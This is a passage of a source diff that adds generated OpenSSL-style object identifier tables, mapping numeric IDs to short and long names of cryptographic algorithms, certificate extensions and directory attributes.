+531,	/* "setct-PInitResData" */
+533,	/* "setct-PResData" */
+594,	/* "setct-RegFormReqTBE" */
+562,	/* "setct-RegFormResTBS" */
+606,	/* "setext-cv" */
+601,	/* "setext-genCrypt" */
+602,	/* "setext-miAuth" */
+604,	/* "setext-pinAny" */
+603,	/* "setext-pinSecure" */
+605,	/* "setext-track2" */
+52,	/* "signingTime" */
+454,	/* "simpleSecurityObject" */
+496,	/* "singleLevelQuality" */
+387,	/* "snmpv2" */
+660,	/* "street" */
+85,	/* "subjectAltName" */
+769,	/* "subjectDirectoryAttributes" */
+398,	/* "subjectInfoAccess" */
+82,	/* "subjectKeyIdentifier" */
+498,	/* "subtreeMaximumQuality" */
+497,	/* "subtreeMinimumQuality" */
+890,	/* "supportedAlgorithms" */
+874,	/* "supportedApplicationContext" */
+402,	/* "targetInformation" */
+864,	/* "telephoneNumber" */
+866,	/* "teletexTerminalIdentifier" */
+865,	/* "telexNumber" */
+459,	/* "textEncodedORAddress" */
+293,	/* "textNotice" */
+133,	/* "timeStamping" */
+106,	/* "title" */
+682,	/* "tpBasis" */
+375,	/* "trustRoot" */
+436,	/* "ucl" */
+888,	/* "uniqueMember" */
+55,	/* "unstructuredAddress" */
+49,	/* "unstructuredName" */
+880,	/* "userCertificate" */
+465,	/* "userClass" */
+879,	/* "userPassword" */
+373,	/* "valid" */
+678,	/* "wap" */
+679,	/* "wap-wsg" */
+735,	/* "wap-wsg-idm-ecid-wtls1" */
+743,	/* "wap-wsg-idm-ecid-wtls10" */
+744,	/* "wap-wsg-idm-ecid-wtls11" */
+745,	/* "wap-wsg-idm-ecid-wtls12" */
+736,	/* "wap-wsg-idm-ecid-wtls3" */
+737,	/* "wap-wsg-idm-ecid-wtls4" */
+738,	/* "wap-wsg-idm-ecid-wtls5" */
+739,	/* "wap-wsg-idm-ecid-wtls6" */
+740,	/* "wap-wsg-idm-ecid-wtls7" */
+741,	/* "wap-wsg-idm-ecid-wtls8" */
+742,	/* "wap-wsg-idm-ecid-wtls9" */
+804,	/* "whirlpool" */
+868,	/* "x121Address" */
+503,	/* "x500UniqueIdentifier" */
+158,	/* "x509Certificate" */
+160,	/* "x509Crl" */
+};
+
+static const unsigned int ln_objs[NUM_LN]={
+363,	/* "AD Time Stamping" */
+405,	/* "ANSI X9.62" */
+368,	/* "Acceptable OCSP Responses" */
+910,	/* "Any Extended Key Usage" */
+664,	/* "Any language" */
+177,	/* "Authority Information Access" */
+365,	/* "Basic OCSP Response" */
+285,	/* "Biometric Info" */
+179,	/* "CA Issuers" */
+785,	/* "CA Repository" */
+954,	/* "CT Certificate SCTs" */
+952,	/* "CT Precertificate Poison" */
+951,	/* "CT Precertificate SCTs" */
+953,	/* "CT Precertificate Signer" */
+131,	/* "Code Signing" */
+783,	/* "Diffie-Hellman based MAC" */
+382,	/* "Directory" */
+392,	/* "Domain" */
+132,	/* "E-mail Protection" */
+389,	/* "Enterprises" */
+384,	/* "Experimental" */
+372,	/* "Extended OCSP Status" */
+172,	/* "Extension Request" */
+813,	/* "GOST 28147-89" */
+849,	/* "GOST 28147-89 Cryptocom ParamSet" */
+815,	/* "GOST 28147-89 MAC" */
+851,	/* "GOST 34.10-2001 Cryptocom" */
+850,	/* "GOST 34.10-94 Cryptocom" */
+811,	/* "GOST R 34.10-2001" */
+817,	/* "GOST R 34.10-2001 DH" */
+812,	/* "GOST R 34.10-94" */
+818,	/* "GOST R 34.10-94 DH" */
+809,	/* "GOST R 34.11-94" */
+816,	/* "GOST R 34.11-94 PRF" */
+807,	/* "GOST R 34.11-94 with GOST R 34.10-2001" */
+853,	/* "GOST R 34.11-94 with GOST R 34.10-2001 Cryptocom" */
+808,	/* "GOST R 34.11-94 with GOST R 34.10-94" */
+852,	/* "GOST R 34.11-94 with GOST R 34.10-94 Cryptocom" */
+854,	/* "GOST R 3410-2001 Parameter Set Cryptocom" */
+810,	/* "HMAC GOST 34.11-94" */
+432,	/* "Hold Instruction Call Issuer" */
+430,	/* "Hold Instruction Code" */
+431,	/* "Hold Instruction None" */
+433,	/* "Hold Instruction Reject" */
+634,	/* "ICC or token signature" */
+294,	/* "IPSec End System" */
+295,	/* "IPSec Tunnel" */
+296,	/* "IPSec User" */
+182,	/* "ISO Member Body" */
+183,	/* "ISO US Member Body" */
+667,	/* "Independent" */
+665,	/* "Inherit all" */
+647,	/* "International Organizations" */
+142,	/* "Invalidity Date" */
+504,	/* "MIME MHS" */
+388,	/* "Mail" */
+383,	/* "Management" */
+417,	/* "Microsoft CSP Name" */
+135,	/* "Microsoft Commercial Code Signing" */
+138,	/* "Microsoft Encrypted File System" */
+171,	/* "Microsoft Extension Request" */
+134,	/* "Microsoft Individual Code Signing" */
+856,	/* "Microsoft Local Key set" */
+137,	/* "Microsoft Server Gated Crypto" */
+648,	/* "Microsoft Smartcardlogin" */
+136,	/* "Microsoft Trust List Signing" */
+649,	/* "Microsoft Universal Principal Name" */
+393,	/* "NULL" */
+404,	/* "NULL" */
+72,	/* "Netscape Base Url" */
+76,	/* "Netscape CA Policy Url" */
+74,	/* "Netscape CA Revocation Url" */
+71,	/* "Netscape Cert Type" */
+58,	/* "Netscape Certificate Extension" */
+79,	/* "Netscape Certificate Sequence" */
+78,	/* "Netscape Comment" */
+57,	/* "Netscape Communications Corp." */
+59,	/* "Netscape Data Type" */
+75,	/* "Netscape Renewal Url" */
+73,	/* "Netscape Revocation Url" */
+77,	/* "Netscape SSL Server Name" */
+139,	/* "Netscape Server Gated Crypto" */
+178,	/* "OCSP" */
+370,	/* "OCSP Archive Cutoff" */
+367,	/* "OCSP CRL ID" */
+369,	/* "OCSP No Check" */
+366,	/* "OCSP Nonce" */
+371,	/* "OCSP Service Locator" */
+180,	/* "OCSP Signing" */
+161,	/* "PBES2" */
+69,	/* "PBKDF2" */
+162,	/* "PBMAC1" */
+127,	/* "PKIX" */
+858,	/* "Permanent Identifier" */
+164,	/* "Policy Qualifier CPS" */
+165,	/* "Policy Qualifier User Notice" */
+385,	/* "Private" */
+663,	/* "Proxy Certificate Information" */
+ 1,	/* "RSA Data Security, Inc." */
+ 2,	/* "RSA Data Security, Inc. PKCS" */
+188,	/* "S/MIME" */
+167,	/* "S/MIME Capabilities" */
+387,	/* "SNMPv2" */
+512,	/* "Secure Electronic Transactions" */
+386,	/* "Security" */
+394,	/* "Selected Attribute Types" */
+143,	/* "Strong Extranet ID" */
+398,	/* "Subject Information Access" */
+130,	/* "TLS Web Client Authentication" */
+129,	/* "TLS Web Server Authentication" */
+133,	/* "Time Stamping" */
+375,	/* "Trust Root" */
+12,	/* "X509" */
+402,	/* "X509v3 AC Targeting" */
+746,	/* "X509v3 Any Policy" */
+90,	/* "X509v3 Authority Key Identifier" */
+87,	/* "X509v3 Basic Constraints" */
+103,	/* "X509v3 CRL Distribution Points" */
+88,	/* "X509v3 CRL Number" */
+141,	/* "X509v3 CRL Reason Code" */
+771,	/* "X509v3 Certificate Issuer" */
+89,	/* "X509v3 Certificate Policies" */
+140,	/* "X509v3 Delta CRL Indicator" */
+126,	/* "X509v3 Extended Key Usage" */
+857,	/* "X509v3 Freshest CRL" */
+748,	/* "X509v3 Inhibit Any Policy" */
+86,	/* "X509v3 Issuer Alternative Name" */
+770,	/* "X509v3 Issuing Distrubution Point" */
+83,	/* "X509v3 Key Usage" */
+666,	/* "X509v3 Name Constraints" */
+403,	/* "X509v3 No Revocation Available" */
+401,	/* "X509v3 Policy Constraints" */
+747,	/* "X509v3 Policy Mappings" */
+84,	/* "X509v3 Private Key Usage Period" */
+85,	/* "X509v3 Subject Alternative Name" */
+769,	/* "X509v3 Subject Directory Attributes" */
+82,	/* "X509v3 Subject Key Identifier" */
+920,	/* "X9.42 DH" */
+184,	/* "X9.57" */
+185,	/* "X9.57 CM ?" */
+478,	/* "aRecord" */
+289,	/* "aaControls" */
+287,	/* "ac-auditEntity" */
+397,	/* "ac-proxying" */
+288,	/* "ac-targeting" */
+446,	/* "account" */
+364,	/* "ad dvcs" */
+606,	/* "additional verification" */
+419,	/* "aes-128-cbc" */
+916,	/* "aes-128-cbc-hmac-sha1" */
+948,	/* "aes-128-cbc-hmac-sha256" */
+896,	/* "aes-128-ccm" */
+421,	/* "aes-128-cfb" */
+650,	/* "aes-128-cfb1" */
+653,	/* "aes-128-cfb8" */
+904,	/* "aes-128-ctr" */
+418,	/* "aes-128-ecb" */
+895,	/* "aes-128-gcm" */
+420,	/* "aes-128-ofb" */
+913,	/* "aes-128-xts" */
+423,	/* "aes-192-cbc" */
+917,	/* "aes-192-cbc-hmac-sha1" */
+949,	/* "aes-192-cbc-hmac-sha256" */
+899,	/* "aes-192-ccm" */
+425,	/* "aes-192-cfb" */
+651,	/* "aes-192-cfb1" */
+654,	/* "aes-192-cfb8" */
+905,	/* "aes-192-ctr" */
+422,	/* "aes-192-ecb" */
+898,	/* "aes-192-gcm" */
+424,	/* "aes-192-ofb" */
+427,	/* "aes-256-cbc" */
+918,	/* "aes-256-cbc-hmac-sha1" */
+950,	/* "aes-256-cbc-hmac-sha256" */
+902,	/* "aes-256-ccm" */
+429,	/* "aes-256-cfb" */
+652,	/* "aes-256-cfb1" */
+655,	/* "aes-256-cfb8" */
+906,	/* "aes-256-ctr" */
+426,	/* "aes-256-ecb" */
+901,	/* "aes-256-gcm" */
+428,	/* "aes-256-ofb" */
+914,	/* "aes-256-xts" */
+376,	/* "algorithm" */
+484,	/* "associatedDomain" */
+485,	/* "associatedName" */
+501,	/* "audio" */
+882,	/* "authorityRevocationList" */
+91,	/* "bf-cbc" */
+93,	/* "bf-cfb" */
+92,	/* "bf-ecb" */
+94,	/* "bf-ofb" */
+921,	/* "brainpoolP160r1" */
+922,	/* "brainpoolP160t1" */
+923,	/* "brainpoolP192r1" */
+924,	/* "brainpoolP192t1" */
+925,	/* "brainpoolP224r1" */
+926,	/* "brainpoolP224t1" */
+927,	/* "brainpoolP256r1" */
+928,	/* "brainpoolP256t1" */
+929,	/* "brainpoolP320r1" */
+930,	/* "brainpoolP320t1" */
+931,	/* "brainpoolP384r1" */
+932,	/* "brainpoolP384t1" */
+933,	/* "brainpoolP512r1" */
+934,	/* "brainpoolP512t1" */
+494,	/* "buildingName" */
+860,	/* "businessCategory" */
+691,	/* "c2onb191v4" */
+692,	/* "c2onb191v5" */
+697,	/* "c2onb239v4" */
+698,	/* "c2onb239v5" */
+684,	/* "c2pnb163v1" */
+685,	/* "c2pnb163v2" */
+686,	/* "c2pnb163v3" */
+687,	/* "c2pnb176v1" */
+693,	/* "c2pnb208w1" */
+699,	/* "c2pnb272w1" */
+700,	/* "c2pnb304w1" */
+702,	/* "c2pnb368w1" */
+688,	/* "c2tnb191v1" */
+689,	/* "c2tnb191v2" */
+690,	/* "c2tnb191v3" */
+694,	/* "c2tnb239v1" */
+695,	/* "c2tnb239v2" */
+696,	/* "c2tnb239v3" */
+701,	/* "c2tnb359v1" */
+703,	/* "c2tnb431r1" */
+881,	/* "cACertificate" */
+483,	/* "cNAMERecord" */
+751,	/* "camellia-128-cbc" */
+757,	/* "camellia-128-cfb" */
+760,	/* "camellia-128-cfb1" */
+763,	/* "camellia-128-cfb8" */
+754,	/* "camellia-128-ecb" */
+766,	/* "camellia-128-ofb" */
+752,	/* "camellia-192-cbc" */
+758,	/* "camellia-192-cfb" */
+761,	/* "camellia-192-cfb1" */
+764,	/* "camellia-192-cfb8" */
+755,	/* "camellia-192-ecb" */
+767,	/* "camellia-192-ofb" */
+753,	/* "camellia-256-cbc" */
+759,	/* "camellia-256-cfb" */
+762,	/* "camellia-256-cfb1" */
+765,	/* "camellia-256-cfb8" */
+756,	/* "camellia-256-ecb" */
+768,	/* "camellia-256-ofb" */
+443,	/* "caseIgnoreIA5StringSyntax" */
+108,	/* "cast5-cbc" */
+110,	/* "cast5-cfb" */
+109,	/* "cast5-ecb" */
+111,	/* "cast5-ofb" */
+152,	/* "certBag" */
+677,	/* "certicom-arc" */
+517,	/* "certificate extensions" */
+883,	/* "certificateRevocationList" */
+54,	/* "challengePassword" */
+407,	/* "characteristic-two-field" */
+395,	/* "clearance" */
+633,	/* "cleartext track 2" */
+894,	/* "cmac" */
+13,	/* "commonName" */
+513,	/* "content types" */
+50,	/* "contentType" */
+53,	/* "countersignature" */
+14,	/* "countryName" */
+153,	/* "crlBag" */
+884,	/* "crossCertificatePair" */
+806,	/* "cryptocom" */
+805,	/* "cryptopro" */
+500,	/* "dITRedirect" */
+451,	/* "dNSDomain" */
+495,	/* "dSAQuality" */
+434,	/* "data" */
+390,	/* "dcObject" */
+891,	/* "deltaRevocationList" */
+31,	/* "des-cbc" */
+643,	/* "des-cdmf" */
+30,	/* "des-cfb" */
+656,	/* "des-cfb1" */
+657,	/* "des-cfb8" */
+29,	/* "des-ecb" */
+32,	/* "des-ede" */
+43,	/* "des-ede-cbc" */
+60,	/* "des-ede-cfb" */
+62,	/* "des-ede-ofb" */
+33,	/* "des-ede3" */
+44,	/* "des-ede3-cbc" */
+61,	/* "des-ede3-cfb" */
+658,	/* "des-ede3-cfb1" */
+659,	/* "des-ede3-cfb8" */
+63,	/* "des-ede3-ofb" */
+45,	/* "des-ofb" */
+107,	/* "description" */
+871,	/* "destinationIndicator" */
+80,	/* "desx-cbc" */
+947,	/* "dh-cofactor-kdf" */
+946,	/* "dh-std-kdf" */
+28,	/* "dhKeyAgreement" */
+941,	/* "dhSinglePass-cofactorDH-sha1kdf-scheme" */
+942,	/* "dhSinglePass-cofactorDH-sha224kdf-scheme" */
+943,	/* "dhSinglePass-cofactorDH-sha256kdf-scheme" */
+944,	/* "dhSinglePass-cofactorDH-sha384kdf-scheme" */
+945,	/* "dhSinglePass-cofactorDH-sha512kdf-scheme" */
+936,	/* "dhSinglePass-stdDH-sha1kdf-scheme" */
+937,	/* "dhSinglePass-stdDH-sha224kdf-scheme" */
+938,	/* "dhSinglePass-stdDH-sha256kdf-scheme" */
+939,	/* "dhSinglePass-stdDH-sha384kdf-scheme" */
+940,	/* "dhSinglePass-stdDH-sha512kdf-scheme" */
+11,	/* "directory services (X.500)" */
+378,	/* "directory services - algorithms" */
+887,	/* "distinguishedName" */
+892,	/* "dmdName" */
+174,	/* "dnQualifier" */
+447,	/* "document" */
+471,	/* "documentAuthor" */
+468,	/* "documentIdentifier" */
+472,	/* "documentLocation" */
+502,	/* "documentPublisher" */
+449,	/* "documentSeries" */
+469,	/* "documentTitle" */
+470,	/* "documentVersion" */
+380,	/* "dod" */
+391,	/* "domainComponent" */
+452,	/* "domainRelatedObject" */
+116,	/* "dsaEncryption" */
+67,	/* "dsaEncryption-old" */
+66,	/* "dsaWithSHA" */
+113,	/* "dsaWithSHA1" */
+70,	/* "dsaWithSHA1-old" */
+802,	/* "dsa_with_SHA224" */
+803,	/* "dsa_with_SHA256" */
+297,	/* "dvcs" */
+791,	/* "ecdsa-with-Recommended" */
+416,	/* "ecdsa-with-SHA1" */
+793,	/* "ecdsa-with-SHA224" */
+794,	/* "ecdsa-with-SHA256" */
+795,	/* "ecdsa-with-SHA384" */
+796,	/* "ecdsa-with-SHA512" */
+792,	/* "ecdsa-with-Specified" */
+48,	/* "emailAddress" */
+632,	/* "encrypted track 2" */
+885,	/* "enhancedSearchGuide" */
+56,	/* "extendedCertificateAttributes" */
+867,	/* "facsimileTelephoneNumber" */
+462,	/* "favouriteDrink" */
+453,	/* "friendlyCountry" */
+490,	/* "friendlyCountryName" */
+156,	/* "friendlyName" */
+631,	/* "generate cryptogram" */
+509,	/* "generationQualifier" */
+601,	/* "generic cryptogram" */
+99,	/* "givenName" */
+814,	/* "gost89-cnt" */
+855,	/* "hmac" */
+780,	/* "hmac-md5" */
+781,	/* "hmac-sha1" */
+797,	/* "hmacWithMD5" */
+163,	/* "hmacWithSHA1" */
+798,	/* "hmacWithSHA224" */
+799,	/* "hmacWithSHA256" */
+800,	/* "hmacWithSHA384" */
+801,	/* "hmacWithSHA512" */
+486,	/* "homePostalAddress" */
+473,	/* "homeTelephoneNumber" */
+466,	/* "host" */
+889,	/* "houseIdentifier" */
+442,	/* "iA5StringSyntax" */
+381,	/* "iana" */
+824,	/* "id-Gost28147-89-CryptoPro-A-ParamSet" */
+825,	/* "id-Gost28147-89-CryptoPro-B-ParamSet" */
+826,	/* "id-Gost28147-89-CryptoPro-C-ParamSet" */
+827,	/* "id-Gost28147-89-CryptoPro-D-ParamSet" */
+819,	/* "id-Gost28147-89-CryptoPro-KeyMeshing" */
+829,	/* "id-Gost28147-89-CryptoPro-Oscar-1-0-ParamSet" */
+828,	/* "id-Gost28147-89-CryptoPro-Oscar-1-1-ParamSet" */
+830,	/* "id-Gost28147-89-CryptoPro-RIC-1-ParamSet" */
+820,	/* "id-Gost28147-89-None-KeyMeshing" */
+823,	/* "id-Gost28147-89-TestParamSet" */
+840,	/* "id-GostR3410-2001-CryptoPro-A-ParamSet" */
+841,	/* "id-GostR3410-2001-CryptoPro-B-ParamSet" */
+842,	/* "id-GostR3410-2001-CryptoPro-C-ParamSet" */
+843,	/* "id-GostR3410-2001-CryptoPro-XchA-ParamSet" */
+844,	/* "id-GostR3410-2001-CryptoPro-XchB-ParamSet" */
+839,	/* "id-GostR3410-2001-TestParamSet" */
+832,	/* "id-GostR3410-94-CryptoPro-A-ParamSet" */
+833,	/* "id-GostR3410-94-CryptoPro-B-ParamSet" */
+834,	/* "id-GostR3410-94-CryptoPro-C-ParamSet" */
+835,	/* "id-GostR3410-94-CryptoPro-D-ParamSet" */
+836,	/* "id-GostR3410-94-CryptoPro-XchA-ParamSet" */
+837,	/* "id-GostR3410-94-CryptoPro-XchB-ParamSet" */
+838,	/* "id-GostR3410-94-CryptoPro-XchC-ParamSet" */
+831,	/* "id-GostR3410-94-TestParamSet" */
+845,	/* "id-GostR3410-94-a" */
+846,	/* "id-GostR3410-94-aBis" */
+847,	/* "id-GostR3410-94-b" */
+848,	/* "id-GostR3410-94-bBis" */
+822,	/* "id-GostR3411-94-CryptoProParamSet" */
+821,	/* "id-GostR3411-94-TestParamSet" */
+266,	/* "id-aca" */
+355,	/* "id-aca-accessIdentity" */
+354,	/* "id-aca-authenticationInfo" */
+356,	/* "id-aca-chargingIdentity" */
+399,	/* "id-aca-encAttrs" */
+357,	/* "id-aca-group" */
+358,	/* "id-aca-role" */
+176,	/* "id-ad" */
+788,	/* "id-aes128-wrap" */
+897,	/* "id-aes128-wrap-pad" */
+789,	/* "id-aes192-wrap" */
+900,	/* "id-aes192-wrap-pad" */
+790,	/* "id-aes256-wrap" */
+903,	/* "id-aes256-wrap-pad" */
+262,	/* "id-alg" */
+893,	/* "id-alg-PWRI-KEK" */
+323,	/* "id-alg-des40" */
+326,	/* "id-alg-dh-pop" */
+325,	/* "id-alg-dh-sig-hmac-sha1" */
+324,	/* "id-alg-noSignature" */
+907,	/* "id-camellia128-wrap" */
+908,	/* "id-camellia192-wrap" */
+909,	/* "id-camellia256-wrap" */
+268,	/* "id-cct" */
+361,	/* "id-cct-PKIData" */
+362,	/* "id-cct-PKIResponse" */
+360,	/* "id-cct-crs" */
+81,	/* "id-ce" */
+680,	/* "id-characteristic-two-basis" */
+263,	/* "id-cmc" */
+334,	/* "id-cmc-addExtensions" */
+346,	/* "id-cmc-confirmCertAcceptance" */
+330,	/* "id-cmc-dataReturn" */
+336,	/* "id-cmc-decryptedPOP" */
+335,	/* "id-cmc-encryptedPOP" */
+339,	/* "id-cmc-getCRL" */
+338,	/* "id-cmc-getCert" */
+328,	/* "id-cmc-identification" */
+329,	/* "id-cmc-identityProof" */
+337,	/* "id-cmc-lraPOPWitness" */
+344,	/* "id-cmc-popLinkRandom" */
+345,	/* "id-cmc-popLinkWitness" */
+343,	/* "id-cmc-queryPending" */
+333,	/* "id-cmc-recipientNonce" */
+341,	/* "id-cmc-regInfo" */
+342,	/* "id-cmc-responseInfo" */
+340,	/* "id-cmc-revokeRequest" */
+332,	/* "id-cmc-senderNonce" */
+327,	/* "id-cmc-statusInfo" */
+331,	/* "id-cmc-transactionId" */
+787,	/* "id-ct-asciiTextWithCRLF" */
+408,	/* "id-ecPublicKey" */
+508,	/* "id-hex-multipart-message" */
+507,	/* "id-hex-partial-message" */
+260,	/* "id-it" */
+302,	/* "id-it-caKeyUpdateInfo" */
+298,	/* "id-it-caProtEncCert" */
+311,	/* "id-it-confirmWaitTime" */
+303,	/* "id-it-currentCRL" */
+300,	/* "id-it-encKeyPairTypes" */
+310,	/* "id-it-implicitConfirm" */
+308,	/* "id-it-keyPairParamRep" */
+307,	/* "id-it-keyPairParamReq" */
+312,	/* "id-it-origPKIMessage" */
+301,	/* "id-it-preferredSymmAlg" */
+309,	/* "id-it-revPassphrase" */
+299,	/* "id-it-signKeyPairTypes" */
+305,	/* "id-it-subscriptionRequest" */
+306,	/* "id-it-subscriptionResponse" */
+784,	/* "id-it-suppLangTags" */
+304,	/* "id-it-unsupportedOIDs" */
+128,	/* "id-kp" */
+280,	/* "id-mod-attribute-cert" */
+274,	/* "id-mod-cmc" */
+277,	/* "id-mod-cmp" */
+284,	/* "id-mod-cmp2000" */
+273,	/* "id-mod-crmf" */
+283,	/* "id-mod-dvcs" */
+275,	/* "id-mod-kea-profile-88" */
+276,	/* "id-mod-kea-profile-93" */
+282,	/* "id-mod-ocsp" */
+278,	/* "id-mod-qualified-cert-88" */
+279,	/* "id-mod-qualified-cert-93" */
+281,	/* "id-mod-timestamp-protocol" */
+264,	/* "id-on" */
+347,	/* "id-on-personalData" */
+265,	/* "id-pda" */
+352,	/* "id-pda-countryOfCitizenship" */
+353,	/* "id-pda-countryOfResidence" */
+348,	/* "id-pda-dateOfBirth" */
+351,	/* "id-pda-gender" */
+349,	/* "id-pda-placeOfBirth" */
+175,	/* "id-pe" */
+261,	/* "id-pkip" */
+258,	/* "id-pkix-mod" */
+269,	/* "id-pkix1-explicit-88" */
+271,	/* "id-pkix1-explicit-93" */
+270,	/* "id-pkix1-implicit-88" */
+272,	/* "id-pkix1-implicit-93" */
+662,	/* "id-ppl" */
+267,	/* "id-qcs" */
+359,	/* "id-qcs-pkixQCSyntax-v1" */
+259,	/* "id-qt" */
+313,	/* "id-regCtrl" */
+316,	/* "id-regCtrl-authenticator" */
+319,	/* "id-regCtrl-oldCertID" */
+318,	/* "id-regCtrl-pkiArchiveOptions" */
+317,	/* "id-regCtrl-pkiPublicationInfo" */
+320,	/* "id-regCtrl-protocolEncrKey" */
+315,	/* "id-regCtrl-regToken" */
+314,	/* "id-regInfo" */
+322,	/* "id-regInfo-certReq" */
+321,	/* "id-regInfo-utf8Pairs" */
+191,	/* "id-smime-aa" */
+215,	/* "id-smime-aa-contentHint" */
+218,	/* "id-smime-aa-contentIdentifier" */
+221,	/* "id-smime-aa-contentReference" */
+240,	/* "id-smime-aa-dvcs-dvc" */
+217,	/* "id-smime-aa-encapContentType" */
+222,	/* "id-smime-aa-encrypKeyPref" */
+220,	/* "id-smime-aa-equivalentLabels" */
+232,	/* "id-smime-aa-ets-CertificateRefs" */
+233,	/* "id-smime-aa-ets-RevocationRefs" */
+238,	/* "id-smime-aa-ets-archiveTimeStamp" */
+237,	/* "id-smime-aa-ets-certCRLTimestamp" */
+234,	/* "id-smime-aa-ets-certValues" */
+227,	/* "id-smime-aa-ets-commitmentType" */
+231,	/* "id-smime-aa-ets-contentTimestamp" */
+236,	/* "id-smime-aa-ets-escTimeStamp" */
+230,	/* "id-smime-aa-ets-otherSigCert" */
+235,	/* "id-smime-aa-ets-revocationValues" */
+226,	/* "id-smime-aa-ets-sigPolicyId" */
+229,	/* "id-smime-aa-ets-signerAttr" */
+228,	/* "id-smime-aa-ets-signerLocation" */
+219,	/* "id-smime-aa-macValue" */
+214,	/* "id-smime-aa-mlExpandHistory" */
+216,	/* "id-smime-aa-msgSigDigest" */
+212,	/* "id-smime-aa-receiptRequest" */
+213,	/* "id-smime-aa-securityLabel" */
+239,	/* "id-smime-aa-signatureType" */
+223,	/* "id-smime-aa-signingCertificate" */
+224,	/* "id-smime-aa-smimeEncryptCerts" */
+225,	/* "id-smime-aa-timeStampToken" */
+192,	/* "id-smime-alg" */
+243,	/* "id-smime-alg-3DESwrap" */
+246,	/* "id-smime-alg-CMS3DESwrap" */
+247,	/* "id-smime-alg-CMSRC2wrap" */
+245,	/* "id-smime-alg-ESDH" */
+241,	/* "id-smime-alg-ESDHwith3DES" */
+242,	/* "id-smime-alg-ESDHwithRC2" */
+244,	/* "id-smime-alg-RC2wrap" */
+193,	/* "id-smime-cd" */
+248,	/* "id-smime-cd-ldap" */
+190,	/* "id-smime-ct" */
+210,	/* "id-smime-ct-DVCSRequestData" */
+211,	/* "id-smime-ct-DVCSResponseData" */
+208,	/* "id-smime-ct-TDTInfo" */
+207,	/* "id-smime-ct-TSTInfo" */
+205,	/* "id-smime-ct-authData" */
+786,	/* "id-smime-ct-compressedData" */
+209,	/* "id-smime-ct-contentInfo" */
+206,	/* "id-smime-ct-publishCert" */
+204,	/* "id-smime-ct-receipt" */
+195,	/* "id-smime-cti" */
+255,	/* "id-smime-cti-ets-proofOfApproval" */
+256,	/* "id-smime-cti-ets-proofOfCreation" */
+253,	/* "id-smime-cti-ets-proofOfDelivery" */
+251,	/* "id-smime-cti-ets-proofOfOrigin" */
+252,	/* "id-smime-cti-ets-proofOfReceipt" */
+254,	/* "id-smime-cti-ets-proofOfSender" */
+189,	/* "id-smime-mod" */
+196,	/* "id-smime-mod-cms" */
+197,	/* "id-smime-mod-ess" */
+202,	/* "id-smime-mod-ets-eSigPolicy-88" */
+203,	/* "id-smime-mod-ets-eSigPolicy-97" */
+200,	/* "id-smime-mod-ets-eSignature-88" */
+201,	/* "id-smime-mod-ets-eSignature-97" */
+199,	/* "id-smime-mod-msg-v3" */
+198,	/* "id-smime-mod-oid" */
+194,	/* "id-smime-spq" */
+250,	/* "id-smime-spq-ets-sqt-unotice" */
+249,	/* "id-smime-spq-ets-sqt-uri" */
+34,	/* "idea-cbc" */
+35,	/* "idea-cfb" */
+36,	/* "idea-ecb" */
+46,	/* "idea-ofb" */
+676,	/* "identified-organization" */
+461,	/* "info" */
+101,	/* "initials" */
+869,	/* "internationaliSDNNumber" */
+749,	/* "ipsec3" */
+750,	/* "ipsec4" */
+181,	/* "iso" */
+623,	/* "issuer capabilities" */
+645,	/* "itu-t" */
+492,	/* "janetMailbox" */
+646,	/* "joint-iso-itu-t" */
+957,	/* "jurisdictionCountryName" */
+955,	/* "jurisdictionLocalityName" */
+956,	/* "jurisdictionStateOrProvinceName" */
+150,	/* "keyBag" */
+773,	/* "kisa" */
+477,	/* "lastModifiedBy" */
+476,	/* "lastModifiedTime" */
+157,	/* "localKeyID" */
+15,	/* "localityName" */
+480,	/* "mXRecord" */
+493,	/* "mailPreferenceOption" */
+467,	/* "manager" */
+ 3,	/* "md2" */
+ 7,	/* "md2WithRSAEncryption" */
+257,	/* "md4" */
+396,	/* "md4WithRSAEncryption" */
+ 4,	/* "md5" */
+114,	/* "md5-sha1" */
+104,	/* "md5WithRSA" */
+ 8,	/* "md5WithRSAEncryption" */
+95,	/* "mdc2" */
+96,	/* "mdc2WithRSA" */
+875,	/* "member" */
+602,	/* "merchant initiated auth" */
+514,	/* "message extensions" */
+51,	/* "messageDigest" */
+911,	/* "mgf1" */
+506,	/* "mime-mhs-bodies" */
+505,	/* "mime-mhs-headings" */
+488,	/* "mobileTelephoneNumber" */
+481,	/* "nSRecord" */
+173,	/* "name" */
+681,	/* "onBasis" */
+379,	/* "org" */
+17,	/* "organizationName" */
+491,	/* "organizationalStatus" */
+18,	/* "organizationalUnitName" */
+475,	/* "otherMailbox" */
+876,	/* "owner" */
+935,	/* "pSpecified" */
+489,	/* "pagerTelephoneNumber" */
+782,	/* "password based MAC" */
+374,	/* "path" */
+621,	/* "payment gateway capabilities" */
+ 9,	/* "pbeWithMD2AndDES-CBC" */
+168,	/* "pbeWithMD2AndRC2-CBC" */
+112,	/* "pbeWithMD5AndCast5CBC" */
+10,	/* "pbeWithMD5AndDES-CBC" */
+169,	/* "pbeWithMD5AndRC2-CBC" */
+148,	/* "pbeWithSHA1And128BitRC2-CBC" */
+144,	/* "pbeWithSHA1And128BitRC4" */
+147,	/* "pbeWithSHA1And2-KeyTripleDES-CBC" */
+146,	/* "pbeWithSHA1And3-KeyTripleDES-CBC" */
+149,	/* "pbeWithSHA1And40BitRC2-CBC" */
+145,	/* "pbeWithSHA1And40BitRC4" */
+170,	/* "pbeWithSHA1AndDES-CBC" */
+68,	/* "pbeWithSHA1AndRC2-CBC" */
+499,	/* "personalSignature" */
+487,	/* "personalTitle" */
+464,	/* "photo" */
+863,	/* "physicalDeliveryOfficeName" */
+437,	/* "pilot" */
+439,	/* "pilotAttributeSyntax" */
+438,	/* "pilotAttributeType" */
+479,	/* "pilotAttributeType27" */
+456,	/* "pilotDSA" */
+441,	/* "pilotGroups" */
+444,	/* "pilotObject" */
+440,	/* "pilotObjectClass" */
+455,	/* "pilotOrganization" */
+445,	/* "pilotPerson" */
+186,	/* "pkcs1" */
+27,	/* "pkcs3" */
+187,	/* "pkcs5" */
+20,	/* "pkcs7" */
+21,	/* "pkcs7-data" */
+25,	/* "pkcs7-digestData" */
+26,	/* "pkcs7-encryptedData" */
+23,	/* "pkcs7-envelopedData" */
+24,	/* "pkcs7-signedAndEnvelopedData" */
+22,	/* "pkcs7-signedData" */
+151,	/* "pkcs8ShroudedKeyBag" */
+47,	/* "pkcs9" */
+862,	/* "postOfficeBox" */
+861,	/* "postalAddress" */
+661,	/* "postalCode" */
+683,	/* "ppBasis" */
+872,	/* "preferredDeliveryMethod" */
+873,	/* "presentationAddress" */
+406,	/* "prime-field" */
+409,	/* "prime192v1" */
+410,	/* "prime192v2" */
+411,	/* "prime192v3" */
